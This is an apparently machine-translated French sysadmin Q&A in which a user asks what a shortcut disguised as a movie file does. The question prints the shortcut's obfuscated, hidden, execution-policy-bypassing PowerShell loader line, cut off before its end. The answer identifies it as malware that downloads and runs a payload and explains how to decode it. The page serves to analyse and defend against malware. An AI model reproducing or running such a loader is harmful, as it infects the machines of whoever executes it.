6 votes

Erik avatar

Que fait spécifiquement ce lien ou est-ce un virus ?

Demandé el 12 de Novembre, 2018
Quand la question a-t-elle été
1364 affichage
Nombre de visites la question a
1 Réponses
Nombre de réponses aux questions
Résolu
Situation réelle de la question

Dans Windows 10, j'ai téléchargé ce fichier que je pensais être un film mais c'était un raccourci avec une taille de 700 Mo

Je vois que la cible est la suivante

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116

Et il était configuré pour démarrer à

%SYSTEMROOT%\System32\WindowsPowerShell\v1.0

Que fait-il?

Demandé el 12 de Novembre, 2018 par Erik

Réponse

Trop de publicités?

8voto

Jens Granlund avatar
Jens Granlund Points 2923

C'est un chargeur de logiciels malveillants.

Il exécute un code PowerShell commençant par New-Object System.N... (caché dans les chiffres), qui correspond au code complet New-Object System.Net.WebClient, lequel sera ensuite utilisé pour télécharger et exécuter le logiciel malveillant réel à partir de l'URL également cachée dans les chiffres ultérieurs du code obfusqué.

Si vous avez déjà cliqué sur le lien, vous êtes probablement déjà infecté, sauf si l'URL a déjà été supprimée.

Vous pouvez essayer de coller votre ligne dans le bloc-notes puis supprimer tout ce qui précède ( -JoiN( (, copier la partie restante (qui commence par ( -JoiN( (...) et la coller dans la fenêtre PowerShell. Cela révélera le code PowerShell obfusqué qui serait normalement exécuté par la commande précédente $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression.

Répondu el 12 de Novembre, 2018 par Jens Granlund (2923 Points )

Questions en vedette

Top Tags

Dans notre réseau

SistemesEz.com

SystemesEZ est une communauté de sysadmins où vous pouvez résoudre vos problèmes et vos doutes. Vous pouvez consulter les questions des autres sysadmins, poser vos propres questions ou résoudre celles des autres.

Powered by:

Yandex
X